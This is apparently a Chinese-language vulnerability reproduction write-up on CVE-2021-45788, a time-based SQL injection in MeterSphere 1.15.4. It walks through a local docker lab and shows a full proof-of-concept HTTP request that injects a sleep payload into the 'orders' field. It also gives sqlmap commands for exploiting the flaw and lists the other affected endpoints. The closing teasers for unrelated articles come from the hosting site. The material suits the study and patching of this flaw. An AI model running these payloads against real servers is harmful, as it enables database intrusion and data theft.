【漏洞复现】CVE-2021-45788 SQL Injection

news/2024/12/24 21:47:03/

漏洞信息

NVD - cve-2021-45788

Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the “orders” parameter.

Authenticated users can control the parameters in the “order by” statement, which causing SQL injection.

API: /test/case/list/{goPage}/{pageSize}

背景介绍

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

主页:https://metersphere.io/

源码:https://github.com/metersphere/metersphere

环境搭建

docker-compose.yml

version: "2.1"
services:web:image: vulhub/metersphere:1.15.4ports:- "8081:8081"- "5005:5005"environment:MYSQL_SERVER: db:3306MYSQL_DB: metersphereMYSQL_USERNAME: rootMYSQL_PASSWORD: rootKAFKA_SERVER: kafka:9092db:image: mysql:5.7command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000environment:- MYSQL_ROOT_PASSWORD=root- MYSQL_DATABASE=meterspherekafka:image: bitnami/kafka:3.4.1environment:# KRaft settings- KAFKA_CFG_NODE_ID=0- KAFKA_CFG_PROCESS_ROLES=controller,broker- KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093# Listeners- KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093- KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092- KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT- KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER- KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI:http://127.0.0.1:8081

在这里插入图片描述

账号admin、密码metersphere

漏洞复现

参考: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

登录Web UI后进入http://127.0.0.1:8081/#/track/case/all创建新的测试用例:

在这里插入图片描述

POC:

POST /test/case/list/1/10 HTTP/1.1
Host: localhost.lan:8081
Content-Length: 3149
Accept: application/json, text/plain, */*
CSRF-TOKEN: fXx2lJHlPYUA1mmtPn69Bhxtx7UVXEz676ScrXnOlFyUcUPQ0hrM9pjbe4U23MDLdURgu8bAJTZdIdVUYsbaOg==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1733898529; skinName=skin-blue3; pageNo=1; pageSize=20; MS_SESSION_ID=2aad45b5-a17a-4a02-8e5d-0321805852d0
Connection: close
{"orders":[{"name":"name","type":",if(1=1,sleep(10),sleep(0))"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}

if分支执行:

在这里插入图片描述

else分支执行:

在这里插入图片描述

基于此可以验证存在时间盲注,通过sqlmap或者自己写爆破脚本实现漏洞利用:

python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user

此外,这个漏洞还存在于很多其他接口:

/test/plan/case/list/all
/test/plan/case/list/ids
/issues/list/{goPage}/{pageSize}
/test/case/list/{goPage}/{pageSize}

漏洞分析

漏洞source位于backend/src/main/java/io/metersphere/track/service/TestPlanTestCaseService.java:

在这里插入图片描述

漏洞sink位于backend/src/main/java/io/metersphere/base/mapper/ext/ExtTestPlanTestCaseMapper.xml:

在这里插入图片描述


http://www.ppmy.cn/news/1557835.html

相关文章

MongoDB教程001:基本常用命令(数据库操作和集合操作)

1.1 案例需求 存放文章评论的数据存放到MongoDB中,数据结构参考如下: 数据库:【articledb】 专栏文章评论comment字段名称字段含义字段类型备注_id(MongoDB自动生成)IDObjectId或StringMongo的主键的字段articleId文…

数据分析帮做spss数据代分析stata实证python统计R语言eviews处理

在数据分析领域,SPSS、Stata、Python(含其数据分析库如NumPy、Pandas等)、R语言和EViews都是广受欢迎且功能强大的工具,它们各自具有独特的优势和适用场景。以下是对这些工具的详细分析: SPSS SPSS(Stati…

京准电钟:电厂自控NTP时间同步服务器技术方案

京准电钟:电厂自控NTP时间同步服务器技术方案 京准电钟:电厂自控NTP时间同步服务器技术方案 随着计算机和网络通信技术的飞速发展,火电厂热工自动化系统数字化、网络化的时代已经到来。一方面它为控制和信息系统之间的数据交换、分析和应用…

Java基础面试题19:解释什么是Servlet链

Java基础面试题:解释什么是Servlet链(Servlet Chaining)? 什么是Servlet链? Servlet链,简单来说,就是把一个Servlet的输出结果交给另一个Servlet处理的一种方法。就像接力赛一样,第一个Servlet完成它的工…

【算法】——双指针(上)

目录 ​编辑 ​编辑 一、前言 二、正文 1.算法介绍 2.算法优点 3.具体案例 3.1 两数之和 3.1.1题目解析 3.1.2 算法原理 3.1.3 具体代码 3.2 三数之和 3.2.1题目解析 3.2.2算法原理 3.2.3具体代码 3.3 四数之和 3.3.1题目解析 3.3.2算法原理 3.3.3具体代码 …

基于Spring Boot的校园车辆管理系统

一、系统背景与意义 随着校园规模的不断扩大和车辆数量的增加,传统的车辆管理方式已经难以满足高效、准确管理车辆的需求。因此,开发一个基于Spring Boot的校园车辆管理系统具有重要的现实意义。该系统可以实现对校园车辆的信息化管理,提高车…

.NET Core 中使用 C# 获取Windows 和 Linux 环境兼容路径合并

在 .NET Core 中使用 C# 处理路径合并并确保在 Windows 和 Linux 环境中都能正常工作,可以使用 System.IO.Path 和 System.IO.Path.Combine 方法。它们是跨平台的,能够根据操作系统自动处理路径分隔符。可以通过 System.Runtime.InteropServices.Runtime…

什么是根服务器?有什么作用?

你知道什么是根服务器吗?在互联网的庞大架构中,根服务器很多人对它的了解并不深入。那么,根服务器到底是什么,它有什么作用呢? 什么是根服务器? 根服务器是互联网域名系统(DNS)的一部分,负责管理和维护最顶层的域名信息。简单…